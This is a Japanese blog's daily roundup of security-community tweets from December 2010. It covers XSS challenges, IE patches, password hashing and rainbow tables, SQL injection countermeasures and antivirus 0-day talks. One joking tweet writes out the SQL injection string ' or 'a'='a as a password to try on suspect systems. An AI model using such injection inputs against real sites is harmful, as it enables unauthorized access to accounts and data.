スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

12月27日のtwitterセキュリティクラスタ

世間はどうやら仕事納めのようです。ということで、休み明けのこのサイトも冬休みに入ります。本年のご愛顧ありがとうございました。また来年もよろしくお願いします。年明けはたぶん仕事始めの5日くらいからの更新になります。

朝から脆弱性ダウジングの話題で盛り上がってました。キャンプでこんなことをしていたから外部から不審人物集団と勘違いされて仕分け(以下略)
ntsuji: スピリチュアル ダウジングなるものの広告が目に入りました。脆弱性は見つけられないみたいですよ。

ntsuji: 脆弱性ダウジング。響きがちょっとかっこいいですよ。

ymzkei5: 右手にnmap、左手にNessusを持って、穴が見つかるまで歩きまわる?w RT @ntsuji: 脆弱性ダウジング。響きがちょっとかっこいいですよ。

wahrheit_t: 右手にKismet、左手にAircrack…これじゃただのWar driving QT @ymzkei5: 右手にnmap、左手にNessusを持って、穴が見つかるまで歩きまわる?w RT ntsuji: 脆弱性ダウジング。響きがちょっとかっこいいですよ。

ymzkei5: それじゃあ、ただの某セキュリティキャンプの風景。(ぇw) ・・・あ、左手にアンテナか?w RT @wahrheit_t: 右手にKismet、左手にAircrack…これじゃただのWar driving

umq: @ymzkei5 ダウジングならオカルトっぽくもっと見つけられなさそうなツール使わないと

ymzkei5: とすると、pingコマンドで脆弱性を見つける、「セキュリティ・コンダクター」が最強!ということかw >http://mubou.seesaa.net/article/10976839.html



来年は非公式セキュリティキャンプ・キャラバンが開催されるそうです。非公式なのは仕分けの影響なのでしょうかね。あと、東京ではやらないのでしょうか?
hasegawayosuke: そろそろ準備ととのってきたから書いちゃっていいよね。2/12 札幌、3/12 大阪梅田でセキュリティキャンプ・キャラバン(非公式)を開催します。札幌は、園田さん、愛甲さん、僕。大阪は国分さん×2と、もしかしたら園田さんも。 #spcamp

ikepyon: 大阪では夫婦漫才が見れますか?w RT: @hasegawayosuke: 2/12 札幌、3/12 大阪梅田でセキュリティキャンプ・キャラバン(非公式)を開催します。札幌は、園田さん、愛甲さん、僕。大阪は国分さん×2と、もしかしたら園田さんも。 #spcamp

hasegawayosuke: 札幌は、北海道情報セキュリティ勉強会(セキュポロ)、大阪はまっちゃ139のご協力で開催です。コミュニティのみなさまに感謝でございます。 #spcamp

hasegawayosuke: 「セプキャンで私が得たもの」 RT @kuroneko_stacy: つーか、マジでネタがないので本気で困る。最近追っかけてないしなァ・・・。何しゃべったらいいのやらー。

kuroneko_stacy: @hasegawayosuke そのネタはガチでやってもネタでやっても、ネタにしかならないようなw



確認してみないと。
yoggy: そういえばHJ1月号のscoreserver.rbのインストール解説記事のスクリーンショットにネタ仕込んでるのに気がついた人いる?



あと、気になったことはこのあたり。
katsuny3: 困った時はnetstat -anb ! -bは、XP SP2から使えるようになりました RT @kchr: Windowsでポートをあけてるアプリを特定したい時はコマンド「netstab -b」でアプリ毎のリストが出てくる。超便利。 "-b"オプションっていつからあったんだろう。


kensukenaoe: 来年キャンパス内WiMAXのサービスが始まると、学生は家でWiMAX使うからキャンパスに来ても設定そのままにする、つまりキャンパスで無線LANを使わない学生がかなりの割合で出てくると思う。


gohsuket: KinectをUbuntuとOSXで動かすガイドはココに RT @mpesce: For anyone interested, this wiki page has full instructions for Ubuntu & OSX: http://bit.ly/g3tkcK


ScanNetSecurity: 新着セキュリティNEWS : 人気記事ランキング:第52週 http://scan.netsecurity.ne.jp/archives/51926265.html


NobMiwa: ファミマTカード、一部停止…米で不正利用か http://bit.ly/fGI5BH


port139: いわゆる携帯デバイスをWindowsに接続して、Windowsの論理ドライブとしては認識できる状態から、EnCaseでAdd Deviceしてもデバイスのセクタで読み取りエラーになってしまう件のテスト中なんですが、逆にエラーになるデバイスが手元にない罠。
スポンサーサイト

テーマ : セキュリティ
ジャンル : コンピュータ

12月23~26日のtwitterセキュリティクラスタ

大阪に行ったり帰ったりアヒルを見たりM1を見たり有馬記念を何とか当てたりしていました。またすぐに冬休みですね。とりあえずざっくり眺めていたTLで気になったことはこのあたり。

okomeki: 「第一回真の闇プログラマ認定プログラミングコンテスト」開 http://goo.gl/0agzT


tomoki0sanaki: 今年の XSS にはこんな事件もありましたね。「ApacheのサーバがXSSでセッションハイジャック、パスワード流出の可能性(Apache) http://bit.ly/e9tBXB」 QT @kaito834 XSSの事例は少ないと思うので・・・


bakera: [メモ] 「ブラウザによるアクセスでサーバが落ちることもある」と知っている人がどこかのサイトを見た時たまたまサーバが落ちたら、逮捕されても文句は言えない? http://slashdot.jp/security/comments.pl?sid=517711&cid=1879529

bakera: しかし、「ITエンジニアの作ったプログラムもしくは図書館システムのプログラムにもし数行のセキュリティ・コードが書き加えられていたら、このような問題は発生しなかったと思われる。」……というのは、ちょっと賛同できないですね。設計からしてダメだと思うので。



miryu: 「インターネット業界人が答えを知っている必要がある10の質問」で2011年を考える - Future Insight http://htn.to/kgMtjC


connect24h: App storeをあさっていたら、いろんなアプリがセールしている!Mobile RSS Proが115円、Reed It Later Proが350円。DocScannerも105円で買った。買いまくっている。Free版で愛用している。CamSnannerは買いそびれた。残念


gohsuket: スゴい。Safe Harborポリシーがちゃんとある。RT @zonbi: オンラインストレージのiDriveも無料5GBで転送ファイル容量の制限無しだす。紹介URLからサインアップすると双方に1GB追加されまするよ。お願いしまするー! http://bit.ly/eP9mhP


hasegawayosuke: http://bijo-linux.com/girls/ これ、なんのディストリビューションなの?


katsuny3: タスクスケジューラの脆弱性の話。ちょうどStuxnet絡みの資料作ってたから大助かりw RT @EijiYoshida: SPNのML会員限定に塩月が週一程度でセキュリティ情報を提供する「SPN通信」がスタートしました。会員の方は読んでくださいね~

EijiYoshida: 塩月さんにSPN通信のことを聞いたら「えっ、Jamesも書くんだよ」って言われた。オレもだったのか(^^;)


kjmkjm: JNSAセキュリティ10大ニュース http://goo.gl/PxvEC 「ガンブラーウイルス改め『ドライブ・バイ・ダウンロード』攻撃」って……。そう言ってしまうと、歴史に逆行してしまわなイカ? gumblarの前からdrive by downloadはあったよ。

kjmkjm: 全てが自動化されていて自己増殖的に広がっていく、というところこそが、gumblarの新しさだったと思うのです。


Ji2Japan: フォレンジック調査チーム作成ツール 「蟹Yaffs」をUPしました。 GNU GPL公開されているunyaffsを基に.NET・Windows化を目指した、Yaffs2イメージファイルパースツールです。 http://bit.ly/7iTr9J


ockeghem: 後で確認する / サイト管理者はご用心―Appacheサーバーにマルウェアを仕込む新しいスパム手口発見 http://htn.to/n7kPbM

テーマ : セキュリティ
ジャンル : コンピュータ

12月21日のtwitterセキュリティクラスタ

もうそろそろ今年も終わりですね。ガンブラーが流行ったのはずいぶんと前だった記憶があるのですが今年ですね。
sen_u: 今年の10大セキュリティニュースを選んでみました。 ScanNetSecurity編集部選 2010年10大セキュリティ事件 http://d.hatena.ne.jp/sen-u/20101221/p1



クリスマスプレゼントがマルウェアはやだなあ。
ScanNetSecurity: 新着セキュリティNEWS : クリスマスに向けアマゾンを装うメールでマルウェア攻撃が拡大中 他(ダイジェストニュース) http://scan.netsecurity.ne.jp/archives/51924196.html



ちょっと性能が上がったみたいですが、相変わらずタダなりなんでしょうか。とりあえずあまり使わないマシンでは使わせていただくことにします。
Ikarashi: マイクロソフト、「Security Essentials 2.0」をリリース - CNET Japan http://bit.ly/gFMQ6B



その他気になったことはこのあたり。
connect24h: んー…RT 第8回 Winnyによる情報漏えいのその後――経営者が考えるべき対策 http://bit.ly/hKvzsB


ripjyr: それなら?それなら??? QT @MetaX_Puorin: それなら行きます(>_<) RT “@yznine: ぜひぜひ!! RT @ripjyr: セキュリティキャンプキャラバン関西とかをやるか!”


ockeghem: ご愛読ありがとうございます / 情報処理推進機構:プレス発表:記事:「安全なウェブサイトの作り方」のダウンロード件数が250万件を突破 http://htn.to/9R5Qf1


ymzkei5: XSS大丈夫かなーとか思ってしまうのは、職業病?w >■mixi日記、デコメで更新可能に - ITmedia News http://www.itmedia.co.jp/news/articles/1012/20/news096.html


Murashima: IPv4アドレスはどう枯渇し何を変えるのか - 記者の眼:ITpro http://goo.gl/PTxaH


なお、出張のため今週の更新はこれで終わりです。あしからずご了承ください。

テーマ : セキュリティ
ジャンル : コンピュータ

12月20日のtwitterセキュリティクラスタ

だんだん気分は冬休みです。TLもボーナスとか忘年会とか腹立たしいですね。

@hasegawayousukeさんのXSS問題、解ける人がいるんですねえ。さすが。
yoggy: Happy Merry XSSをちょっと試してみたけどJavaScriptはさっぱりわからんので寝る。[]で崩せそうな気がするのだけどその先が…w

masa141421356: 解けたので足跡を残してみた。 http://utf-8.jp/cgi-bin/xssme.cgi



あと気になったことはこのあたり。
masa141421356: @hasegawayosuke 言われてみるとIEの条件HTMLコメント*だけ*がXSSで通るサイトを作るには"--"を注入できないけど ">","<"を注入できる必要があるので普通のサイトじゃまず有り得ないんですね


bakera: [メモ] 「マジコンを潰すマジックマスター」……これは某所でも話題になっていましたね。 http://allabout.co.jp/gm/gc/373921/3/


risa_ozaki: 1億ドルはどこへ消えた―検索広告ビジネスの闇: オンライン広告を土壌とした詐欺の被害額は、年間1億ドル規模になるという。デジタルマーケットの専門家であるベンジャミン・エデルマン氏に、広告詐欺のグローバルトレンドや、Googleと… http://bit.ly/dJ4Uvk


risa_ozaki: 知らない間につきまとわれている!? ネットストーカーの脅威とは? http://r25.yahoo.co.jp/fushigi/report/?id=20101215-00004636-r25&vos=nr25an0000001


hasegawayosuke: Windows のバッチファイルは、shift コマンドのあとでも %* すると %1 が表示されるとか、未だに奥が深いですね! [バッドノウハウ]


takesako: 「セキュリティ&プログラミングキャンプ2010実施報告会」をトゥギャりました。 http://togetter.com/li/80935


cchanabo: 【IPAより(自分用メモ)】平成22年度秋期情報処理技術者試験(応用情報技術者試験、高度試験)の合格発表について~ITストラテジスト試験、ITサービスマネージャ試験は過去最高の合格率?http://www.ipa.go.jp/about/press/20101220_2.html


rryu2010: プライバシーマーク運用代行業者がPマークを持っていなかったりとツッコミどころが多いという話。 / プライバシーマーク運用代行ねぇ ? MarkupDancing http://htn.to/9Ce8Z7


packet_storm: English Defence League Database Hacked http://packetstormsecurity.org/news/18340 #news

テーマ : セキュリティ
ジャンル : コンピュータ

12月18~19日のtwitterセキュリティクラスタ

週末はさまざまな勉強会や発表会があったようです。皆様お疲れさまでした。
ripjyr: 「第21回まっちゃ139勉強会(Mixiの中の人による「mixiのシステム構成・運用管理について」)のTweetまとめ」をトゥギャりました。 http://togetter.com/li/80550

hasegawayosuke: 本日の「0と1しか興味ない人のためのマルウェア分析会」の資料を公開しました。 http://utf-8.jp/public/20101218/jsobfus.pptx #01binarians

hasegawayosuke: 10月の「ブラックハットジャパンその後 関西編」、11月の「AVTokyo2010」での資料を公開しました。 http://utf-8.jp/public/20101106/avtokyo.pptx #BHJ #AVTokyo

_kana: ブラックバットジャパンになってる!黒コウモリってw http://twitpic.com/3gy37q

sonodam: 吉岡さん「価値観を継承したい。事業続くかどうかわからんけどねー」 #spcamp



そして、個人情報を流したりしたあのMDISがPマークを更新されたそうです。Pマークって持ってるからといって個人情報の管理に厳格なわけではないのですね。
asuka645: JISA 平成22年度第7回審査会において、@mdisさんがプライバシーマークの更新認定を受けました http://bit.ly/dU8IZX この逆風の最中、あえて更新されたことに敬意を表します #librahack

Takeshich: Pマーク関連でイライラしているところに、MDISが更新できたという件を知り、すごく残念感が漂ってます。

tyappi: 「「Pマーク」終了のお知らせ - MDIS 個人情報公開しても [Pマーク更新]」をトゥギャりました。 http://togetter.com/li/80397 #librahack

bugbird: …ということで、日記に「弔辞」を書いたw http://bit.ly/fNj9OC

Takeshich: Pマークはお金出せばもらえるものと思えるようになった。

HiromitsuTakagi: こういうのって何なの?



むつかしい… 改行ってどうやって入れればいいのやら…
hasegawayosuke: XSS練習問題。 がんばって、alert(1) 動かしてみてね! http://utf-8.jp/cgi-bin/xssme.cgi



あと気になったことはこのあたり。
RyusukeKIKUCHI: 「解決策もセットでないと問題点を指摘してはいけない」という雰囲気が,結局,問題への対処を遅らせているような気がする,今日このごろ...


a4lg: VMware 製品を買うときにはクーポンを検索するのが吉。Fusion を 20% 引きで買えた。


hasegawayosuke: 時間あったら、明日の勉強会用に Wall of Sheep みたいな仕組み作ろうと思ってたけど間に合わんかった。次の機会にはぜひさらし上げよう。


gohsuket: 来年こそは韓国セキュリティ女子に会えるPOCへどうぞw その前にもCodegateもあるはず。 RT @hasegawayosuke: RT @07c00: 韓国POCの話を聞いて、ものすごい行きたかった感が出てきた…。もう遅いけどヽ(`Д´)ノワーン


JVN: ISC BIND named validator に脆弱性 http://jvn.jp/cert/JVNVU837744/

JVN: ISC BIND におけるサービス運用妨害 (DoS) の脆弱性 http://jvn.jp/cert/JVNVU706148/


ikepyon: のんべぇの筋w RT: @hebikuzure: 「その筋」ってどんな筋だ ww QT @hasegawayosuke: 「日本ではその筋の人なら知っているであろう「チームチドリ」のTessyさん」 http://bit.ly/eU6JnF


hasegawayosuke: 正直に言うと、25日間も興味が継続しないので sym トラックもう飽きてる。


nca_gr_jp: 『新しいタイプの攻撃』に関するレポート~Stuxnet(スタックスネット)をはじめとした新しいサイバー攻撃手法の出現~ http://bit.ly/fKbc9d (い)


ikepyon: @hebikuzure 間違えてました。正しくは「' or 'a'='a」ですねw。これから、怪しいシステムは全てパスワードを「' or 'a'='a」にするかな?w


ockeghem: 『Internet Explorer には、ファイル判別処理に起因するクロスサイトスクリプティングの脆弱性が存在します…報告者: 楽天株式会社 福本佳成 氏』<福本さんGJ / JVN#62275332: Internet Explor… http://htn.to/Pb8Crb


ockeghem: evalを使う良い例が思いつかない。「サイバーテロの技法」でも、サンプルはevalではなく、preg_replaceのe修飾子つき

テーマ : セキュリティ
ジャンル : コンピュータ

12月16日のtwitterセキュリティクラスタ

個人的にはほぼIEを使うことはないのですが、Windows Updateするよい子のみんなは文字化けするようになったそうです。
bakera: IE8で文字化けする。Firefoxだと無問題。例のISO-2022-JPのXSSの修正に関係しているような気がする。 http://www.irem.co.jp/contents/gallery/aprilfool_04/menu/bydo_b.html

k_morihisa: 先日の Windows Update 以後,IE8 + ISO-2022-JP のページで文字化けが起こるらしい.

hasegawayosuke: この文字化けの原因は、MS10-090で文字エンコーディングの取り扱いに関して複数の修正がはいったことに起因するのは事実だけれど、CVE-2010-3348 の ISO-2022-JP の取り扱いに関する修正ではなく、CVE-2010-3342 のほうですね、たぶん。



どうにもソニーストアの評判がよろしくないようですが、せんせいは何を買おうとしたのかも気になります。
HiromitsuTakagi: クソニーストア、マジだった。ソニー製品買わなくなって久しいので気づきもしなかった。 http://www.jp.sonystyle.com/ 適当にカートに入れて「レジに進む」でドカン。ばーーーーーーーーーーーーーーーーーか。

HiromitsuTakagi: http://www.jp.sonystyle.com/Security/index.html の注意書き「ログインしている間は、ストア以外のウェブサイトを閲覧されないことをお勧め」は9年前に私がXSSを指摘したときに書かれたものだけど、XSS解消が当然の今どき、これはないよね。

HiromitsuTakagi: 「ログインしている間は、ストア以外のウェブサイトを閲覧されないことをお勧め」としている一方で、https://msc.sony.jp/member/faq/service.jsp#kantanlogin 「かんたんログイン」なるものを提供してる。ていうかこれ、ログイン状態を維持…



あと気になったことはこのあたり。

vulcain: https://www.google.com/accounts/PasswordHelp を見るとPWの定期変更を推奨しているなぁ。。。しかも、英単語に記号を一つ追加するだけで良好なパスワードと判定するGoogleさんは脳天気じゃなイカ?<まぁ9文字超えてますが


k4403: 「使ってはいけないパスワード」トップ50が公開、1位は「123456」で2位は「password」に - GIGAZINE http://htn.to/fN1E9m


okomeki: IEの文字コード的なバグ/セキュリティをひとつ修正してもらった→ http://jvn.jp/jp/JVN33301529/index.html いろいろ高になってて恐ろし


msaitotypeR: あれ?「有識者」の名前でないんだ。IPA 「サービス妨害攻撃の対策等調査」報告書 http://www.ipa.go.jp/security/fy22/reports/isec-dos/index.html


kensukesan: セプキャン2011実施報告会では,個人的にUStreamで中継するので,これない人はこれで見てください。 http://tinyurl.com/246phkh #spcamp

テーマ : セキュリティ
ジャンル : コンピュータ

12月15日のtwitterセキュリティクラスタ

韓国でPOC2010というセキュリティカンファレンスが開かれているらしく、そのあたりのツイートが流れてきておきます。見ているだけで興味深いセッションがいくつかありますが、その中から。

アンチウイルスの0-day発表会の様子。あの手の製品ってウイルスには強いのかもしれませんがソフトとしてどうなの?ってものが結構ありますよね。
a4lg: ViRobot アンチウイルス製品の脆弱性。strcpy によるバッファオーバーフロー (ドライバのデータ領域を上書きする。) #poc2010

a4lg: もうひとつの nProtect 脆弱性。整数オーバーフローによって過度に小さなバッファが確保されてしまい、結果としてシステムをクラッシュさせる。 #poc2010

a4lg: 今度は NProtect の脆弱性。これはちょっと複雑で、スライドからは正確な意味を読み取れない。 #poc2010

a4lg: 中国語のスピーチなのでスライドだけで読み取る。まず最初の例として挙げられたのが Ahnlab V3 に存在するカーネルモード脆弱性。 #poc2010

a4lg: Ring 0 での任意コード実行脆弱性 #poc2010

suma90h: @a4lg nProtectってネトゲとかのプロテクトに使われるGame Guardじゃなくて、アンチウイルスとしての方っぽいですね

a4lg: @suma90h あぁそうです。このセッションはアンチウイルス製品の 0-day を晒す会みたいな雰囲気になってますw



そして、Windowsの電卓こわい、危険!という話(違う)
hasegawayosuke: Flash JIT つかって IE の DEP 回避のデモ。

hasegawayosuke: ASLRが効いてない3rd party plugins for IE/Win7 : JRE, Adobe Shockwave, ...

hasegawayosuke: つうか、Win7 で普通にIEから電卓立ち上がりすぎで怖いねw

hasegawayosuke: 「私の電卓、立ち上がりすぎっ!?」

ockeghem: @hasegawayosuke そろそろ、「電卓は危険」とか「たとえば、電卓を避ける」とか言い出す頃

ymzkei5: calc.exeをcolc.exeにリネームしましょうとかねw RT @ockeghem: @hasegawayosuke そろそろ、「電卓は危険」とか「たとえば、電卓を避ける」とか言い出す頃



確かにRainbowTableのためにHDDを買う人とかいますからね。量が増えると読むのも大変でしょうし。
tomoki0sanaki: RainbowCrack をパスワードクラックの革命的出来事ではないぞえ。まず、RainbowTable の作成が大変。RainbowTableが、結局まだデカイ。RainbowTableの読み出し(HDDの読み出し速度)が遅い。

tomoki0sanaki: 実際、8文字ぐらいで RainbowTable のサイズが発散していく(テラを越え~♪、ペタを越え~♪、スーパースターは飛んでいく♪)



他に気になったことはこのあたり。
tomokoNeko: 恐いずら???! RT @8zz: GIGAZINE: ニセのハードディスク診断ツール「Win HDD」の詐欺手口を解説 http://dlvr.it/BPjwh


hasegawayosuke: カーネルデバッガでブルースクリーンを任意の色に。おもしろいな。 http://bit.ly/h4xOUm


risa_ozaki: 間違いだらけのセキュリティ設計: 「セキュリティばかり重視」 http://j.mp/fYIVZy


piyokango: YoutubeにIPAチャンネルなるものが出来てた。http://bit.ly/hSUnqq


bakera: 図書館の脆弱性修正完了報告メールが大量に来ました……。


kikuzou: アライジンクマルウェア キター http://twitpic.com/3g168q


jpcert: こんにちは。実際の攻撃事例の報告が寄せられましたので、注意喚起を更新しました。適切なパスワード設定になっているか、ご確認ください。^KS https://www.jpcert.or.jp/at/2010/at100032.txt


hasegawayosuke: コメントでJSONを囲ってJSON内の機密情報を守るという手法は、IEの条件付きコメントをうまく利用すると破ることができそうな気がしてきた。


okomeki: おおっ。公開されましたか。 RT @hasegawayosuke: IE6/7/8 ISO-2022-JP XSS issue found by @okomeki is fixed by today's patch, MS10-090.


ripjyr: 第21回まっちゃ139勉強会は、なんと78名参加申請いただいています!本当に感謝感謝!お会いできるのを楽しみにしています!

ripjyr: 第21回まっちゃ139勉強会のお菓子、ミルフィーユ20個、プリン20個、モンブラン20個、パニエ5個、フリュイ5個 で予約しました!!!楽しみです! #matcha139


gohsuket: セキュリティ会社Arborによるウィキリークス関連のDDoS戦争の状況 RT @evgenymorozov: The Internet Goes to War -> good stats from Arbor Networks http://bit.ly/grg8Se


bulkneets: ようやく同じ人に何回もフォローされる現象が確認できた、ユニークインデックス張れや


okomeki: 著作権法改正でマジコンやDVD暗号回避など規制へ、文化庁が意見募集 -INTERNET Watch http://t.co/FiOdBkx via @internet_watch


tomoki0sanaki: スゲー!!!!「ブラウザだけでWindows 3.1をほぼ完全にエミュレートだと・・・?!『michaelv.org』 http://bit.ly/dSaYAj


_hito_: CVE-2010-4344が斬新すぎる。中身じゃなく見つかり方が。


syonbori: 斜め読みしてたら、マルウェアオンリーイベントという文字列が生成された

syonbori: 基本的にWindows総受けだろうけど、最近はFlashとかAdobe readerあたりも受け人気よね

テーマ : セキュリティ
ジャンル : コンピュータ

12月14日のtwitterセキュリティクラスタ

昨日はlivlisが話題でした。招待制で友達がいないと招待されないので、もちろん中野様子はわからないのですが、Webサービスのスタートアップは、話題になれば有志が黙ってても勝手にセキュリティ検査をしてくれるので、コストがかからずありがたい話ですね。
mincemaker: はてな由来だからという理由で捨てアカウント作って試してよかった。

mincemaker: やばいw > の取引情報 http://www.livlis.com/users/show/id/a

mincemaker: http://www.livlis.com/users/show/id/1E+40/ とかにするとテンプレートが当然のようにバグるな。

mincemaker: Twitterでフォローしている中で、かつ Livlisにアカウントがあれば勝手にフォロー待ち行列に入るのか! http://docs.livlis.com/?p=792



IEにまたまた脆弱性。とりあえずDEPは有効にしておいた方がよさげですね。
ikb: JVNVU#634956: Microsoft Internet Explorer に任意のコードが実行される脆弱性 http://t.co/6AN0Hed -- #security ああ、ゼロデイか…。 DEP 有効、ゾーンセキュリティ高はともかくスクリプト無効は厳しいよね。

kaito834: JVNVU#634956(http://jvn.jp/cert/JVNVU634956/) は、Full-Disclosure や exploit-db.com に報告されていたものか。定例外か2011年1月の定例パッチで修正って感じかな。



あと気になったことはこのあたり。
risa_ozaki: 年末年始に注意したいネット詐欺の手口 http://www.itmedia.co.jp/enterprise/articles/1012/13/news073.html


kikuzou: ウイルスバスター2011にアップデートしようとしたら、再起動を何度も聞いてきやがる・・・_| ̄|● メインマシンから作業しなくて正解だった。


sonodam: http://d.hatena.ne.jp/sonodam/<というわけで、実施報告会の交流会でおれLTやってもええぞ的な企画(もちろん全然違うのでも良いっす)募集中だよ。#spcamp


connect24h: フィルタリングの説明 調査へ NHKニュース http://ow.ly/3oJKO


yasulib: 就活してて、企業が求める「コミュニケーション能力」が何か分からなかったので、勝手に「ソーシャルエンジニアリング能力」を求められていると解釈してる。


hanazukin: まっちゃ139ポスターのデータを欲しい!という方は、Googleドキュメントにデータを保存しているので、D でメッセージください ポスターはこんな感じ http://f.hatena.ne.jp/hanazukin/20101213092748


laccotv: 川口洋のつぶやき 第47回?「Flash Playerの自動更新設定を使用しましょう!」を公開しました。 http://www.youtube.com/watch?v=osjZDONwxBc

laccotv: 第47回は、「Flash Playerの更新管理はAdobeサイトで自動化!」という技ありな話。なかなか便利でいいと思います。 http://www.youtube.com/watch?v=osjZDONwxBc


ikepyon: そういやネタプレゼン公開してたん忘れてたw http://www.slideshare.net/ikepyon/ss-6109486 #matcha445


connect24h: 良記事。RT 高木浩光@自宅の日記 - 警察と検察と裁判所で何があったか 岡崎図書館事件(2の1) http://ow.ly/3oDKQ


hack_the_packet: Challenge to HTP(HackThePacket). iPad is waiting for you +_+ http://powerofcommunity.net/event/htp-en.html #HTP


tamiyata: セキュリティ的な対応が入ってるとうれしかった(例えばこちら→ http://bit.ly/fysnT3 )アップデート外すのはちと。/誠 Biz.ID:3分LifeHacking:PDFのお節介を防ぐ7つの方法 - http://bit.ly/hoH0Gp


ntsuji: 最近、めっきり検査以外では使わないですが、バージョンアップしなきゃですよ。 Firefoxの最新版がリリース、11件の脆弱性に対処 - ITmedia エンタープライズ - http://bit.ly/fLiK95

テーマ : セキュリティ
ジャンル : コンピュータ

12月12~13日のtwitterセキュリティクラスタ

やることはあるのですが、早くもすっかり冬休み気分です。

このところ週末は各所で勉強会が開催されていますね。
ripjyr: とりあえず作ったw I'm reading now: Togetter - 「第5回北海道情報セキュリティ勉強会(セキュポロ)」 http://togetter.com/li/78040

piyokango: 今日行った勉強会のまとまってないまとめを書いてみた。これを報告書代わりにしてしまおうと画策。http://bit.ly/gVMeZl http://bit.ly/fiLOgs


そして、まっちゃ445で話題だったパスワードの話。
bugbird: 今は多分4?5のパスフレーズが現役。ポリシは説明できないけど、それを使い分けてそれなりのセキュリティレベルを確保できてるはず

bugbird: で、パスフレーズは変更しているけど、それは何か環境の変化(職場が変わるとか)があった場合。そう云うイベントがないと、新しいパスフレーズは身に付かないということでもある



今知りました。
iru_ca: X-CTF 開催中!オンラインでいつでも参加可能! http://ctf.iruca.cc/ ランキングはこちら http://ctf.iruca.cc/ranking.php



フィルム出しとかストリップ修正とかがなくなって久しいのですが、青焼きってまだ出てたのか…
kenji_s: 青焼きで修正するのってお金がかかるんですか。知らなかった



あと気になったことはこのあたり。
securecat: 「IE6対応をやめて死ねよ的気分を解消しよう」をトゥギャりました。 http://togetter.com/li/77404


piyokango: IPAへの報告やっとしました。探す(やる)のは好きだけど報告が苦手な癖は早く治さないといけませんね。


trendmicro_jp: [セキュリティブログ]感染被害が急増中か?偽セキュリティソフト「Think Point」を解説! http://blog.trendmicro.co.jp/archives/3807


taguchi: 【要注意!!】 Gawkerメディアにて大規模なハッキングが進行中・・・ - http://bit.ly/e2lX3v


ntsuji: 最近、めっきり検査以外では使わないですが、バージョンアップしなきゃですよ。 Firefoxの最新版がリリース、11件の脆弱性に対処 - ITmedia エンタープライズ - http://bit.ly/fLiK95


connect24h: ノートPC紛失のコストは1台当たり5万ドル: 情報セキュリティプロフェッショナルをめざそう!(Sec. Pro. Hacks) http://ow.ly/3nRxc


ikb: わー。「Yahoo!オークションを継続するために、このサイトで手続きしてね!」っていう、どこをどうひっくり返してみてもフィッシングなメールが届いてた。手続きサイトのドメインに yahoo が入ってなくて https でないとか、手抜きにもほどがあるよ。


_kana: BHグッズShopありです RT @decoy_service: "ブラックハットジャパンその後 九州編"は12/18(土)開催です。詳細と懇親会はこちらからご覧ください。 http://bit.ly/g97sQU #hackinthecafe #osc10fk


gohsuket: アノニマスの攻撃ツールLOICはブラウザー上で動くJS。犯罪者ボットネットとの違い via @rsingel: Joining pro-Wikileaks attacks Is as easy as clicking a button http://bit.ly/fguWOB


HiromitsuTakagi: アンチウイルスソフト会社から、「弊社製品、サービスの評判、信頼性を高めていきたいと…弊社製品、サービスなどの情報をご提供差し上げたい…一度、弊社業務のご紹介とあわせてご面会の機会を」というメールが来た。協力するわけねーだろ。見たらわかるだろ。バカじゃネーのか。

HiromitsuTakagi: 「WEB上でセキュリティの専門家としてブログ「高木浩光@自宅の日記」を運営されているのを拝見しました。弊社としては、インターネット上での弊社製品、サービスの評判、信頼性を高めていきたいと考えており、…是非一度、弊社の業務のご紹介とあわせてご面会の機会を頂けましたら」< クタバレ

HiromitsuTakagi: ハギーのとこでも行っとけ。

テーマ : セキュリティ
ジャンル : コンピュータ

12月10~11日のtwitterセキュリティクラスタ

まっちゃ445があったりして、ツイートが貯まっているので日曜日なのに更新してみました。

土曜日にはまっちゃ445が開催されました。興味深そうな話が並んで行きたかったなあと。
まずはECナビ春山さんのパスワードのお話。
matsuu: #matcha445 パスワードを破られにくくする方法を話します。次の2点が望ましい。パスワード情報が漏れないこと、ユーザーが強いパスワードをつけること

matsuu: #matcha445 ユーザーが強いパスワードをつけるのが望ましいが、現実難しい。万が一漏れてしまった場合でも大丈夫な対策を考える。漏れるのはサーバ側からの話かな?

matsuu: #matcha445 パスワードの常識(?)はsaltをつけてハッシュになっている。まずUNIXの仕組みからみていく

matsuu: #matcha445 GNU/Linuxの場合、/etc/shadowにパスワード情報を保存。形式は$id$salt$hashed。idはハッシュ形式、1はmd5、5はSHA-256、6はSHA512

matsuu: #matcha445 saltはハッシュをかきまぜるためにある。saltがなぜ必要か、レインボーテーブルを利用した攻撃が可能になるため。レインボーテーブルは検索するとたくさん出てくる。Free Rainbow Tablesなど

matsuu: #matcha445 WindowsにはLMハッシュ、NTLMハッシュの2つを使ってるが、どちらもsaltが使われてない。レインボーテーブルにもし載ってるなら速攻で破られる。

matsuu: #matcha445 例えばMD5 rainbow tablesは6文字までで5GBぐらい。他にもNTLM rainbow tables, SHA1 rainbow tablesなど。

matsuu: #matcha445 MD5 rainbow tablesの実験。案外早くパスワードを割り出された。salt使わない場合怖い。

matsuu: #matcha445 ハッシュは繰り返しかけます。stretchingという。salt注入はsaltingというらしい。

matsuu: #matcha445 ストレッチングは認証時の負荷は大したレベルではないが、総当たり攻撃する側にとっては負荷が大きい。

matsuu: #matcha445 UNIXは何故ハッシュ方式にしたのか、可逆にしなかったのか。安全に鍵の管理するのが難しい。バックアップから簡単に復元できたらこまりますからね。ですね。

matsuu: #matcha445 なぜsaltはユーザー毎に異なる必要があるのか。同じパスワードだと同じハッシュになってしまうから

matsuu: #matcha445 伝統的なunixではsaltが12bitだった。これは小さすぎた。レインボーテーブルが存在する。現在は96(256?)bitになってる

matsuu: #matcha445 Webシステムだとどうか。パスワード情報と鍵を別に管理可能です。例えば鍵と情報を別サーバに記録すればいい。UNIX(スタンドアロン)よりもパスワード情報と鍵が共に漏洩するリスクは小さくできる。

matsuu: #matcha445 Webシステムでのリスクはパスワード情報の保存に関するリスクのみ。なるほど。なんでもかんでもハッシュ脳じゃなくていいよ。俺ハッシュ脳だ。

matsuu: #matcha445 いくつか方法が。 共通鍵暗号、ハッシュ+暗号、鍵付きハッシュ。鍵付きハッシュ例はHMACなど。


資料はここで公開されているそうです。
haruyama: #matcha445 の資料 http://haruyama.github.com/445_14_20101211/ パスワードの話



次に佐名木さんのSQLインジェクションなお話。
matsuu: #matcha445 アクセス制御を分離しましょう。最低でもSELECTとINSERT/DELETE/UPDATEは分けましょう

matsuu: #matcha445 SQLインジェクションの対策はSQLエスケープとバリデーション。文字列リテラルの場合は'を''へ、DBMSによっては\は\\へ。でもこれはPreparedStatement、バインド機能、パラメータ変数、O/Rマッピングなどをつかいましょうね。

